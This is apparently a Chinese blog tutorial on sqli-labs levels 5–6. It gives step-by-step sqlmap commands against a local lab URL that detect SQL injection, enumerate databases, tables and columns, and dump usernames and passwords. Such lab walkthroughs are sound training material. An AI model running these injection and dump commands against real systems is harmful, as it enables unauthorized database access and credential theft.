sqli-labs靶场5-6 工具sqlmap GET方法、单双引号、报错注入
sqli-labs靶场5-6 工具sqlmap GET方法、单双引号、报错注入
目录
三、Less5(GET-Double injection-Single Quotes -String)
推荐:
一、错误注入(sqlmap)SQL注入基本步骤:
第一步:注入点测试
第二步:爆数据库名
第三步:爆数据库表
第四步:爆字段
第五步:爆数据
二、扩展
2.1、命令扩展
(1)如果提前找到了数据库类型
--dbms +数据库
(2)扫描的等级
最高等级是
--leve=5 --risk=3
2.2、注:
我使用Windows中的sqlmap做,会带上python sqlmap.py
Linux:直接sqlmap +……
2.3、推荐:
三、Less5(GET-Double injection-Single Quotes -String)
3.1、第一步:检测是否存在注入
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch是使用默认设置
其实环境都扫出来了
就可以再加上--dbms mysql了
3.2、第二步:爆数据库名
命令
#获取全部数据库
sqlmap.py -u url --dbs --batch
---------
#获取当前数据库
sqlmap.py -u url --current-dbs --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
3.3、第三步:爆数据库表名
命令
python sqlmap.py -u url -D DB --tables --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
3.4、第四步:爆字段名
命令:
sqlmap.py -u url -D DB -T TBL --columns --batch
基础操作
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
3.5、第五步:爆数据
命令:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
基础操作:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
注:
(5-6关基本类似,就以第五关为例)
- 点赞
- 收藏
- 关注作者
评论(0)